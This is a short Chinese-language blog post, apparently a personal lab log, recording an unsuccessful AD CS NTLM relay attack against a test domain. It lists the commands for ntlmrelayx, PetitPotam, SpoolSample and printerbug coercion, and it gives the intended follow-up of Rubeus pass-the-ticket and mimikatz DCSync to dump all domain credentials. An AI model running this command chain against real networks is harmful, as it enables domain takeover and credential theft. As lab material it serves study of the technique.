1. 程式人生 > 其它 >ADCS relay攻擊(失敗)

ADCS relay攻擊(失敗)

先說說我的環境

攻擊機 192.168.149.139 Kali
DC主機 192.168.149.211    win2012 R2
AD CS   192.168.149.213     win2008 R2

可能是ADCS伺服器不能用win08的吧

 

 

 先用攻擊機簡單試探一下,看看curl能不能ok,curl 192.168.149.213/certsrv/ -I,然後看看我們的證書,certutil -config - -ping

 

 

 環境簡單測試沒有問題,現在開始切入正題,始終抓不到,媽的

python3 ntlmrelayx.py -debug -smb2support --target http://192.168.149.213/certsrv/certfnsh.asp --adcs --template DomainController

ADCS執行

PetitPotam.exe 192.168.149.139 192.168.149.211 1

 

攻擊成功,然而並沒有彈過來,淦

 

 

python3 ntlmrelayx.py -t http://192.168.149.213/certsrv/certfnsh.asp -smb2support --adcs 

kali執行

python3 ntlmrelayx.py -debug -smb2support --target http://192.168.149.213/certsrv/certfnsh.asp --adcs --template DomainController

ADCS執行

 

 

 

SpoolSample.exe 192.168.149.211 192.168.149.139

kali執行

python3 printerbug.py leecinsy/administrator:[email protected] 192.168.149.139

失敗

 

 python3 ntlmrelayx.py -t http://192.168.149.213/certsrv/certfnsh.asp -smb2support --adcs

ADCS執行

PetitPotam.exe 192.168.149.139 192.168.149.211 1

失敗

那就先假裝我抓到了,後續的步驟是

Rubeus.exe asktgt /outfile:kirbi /user:DC機器名 /ptt /certificate:<Base64> 

lsadump::dcsync /domain:leecinsy.com /all /csv      //dcsync攻擊

 

後續

可能太菜了,最主要是要清楚攻擊的流程和步驟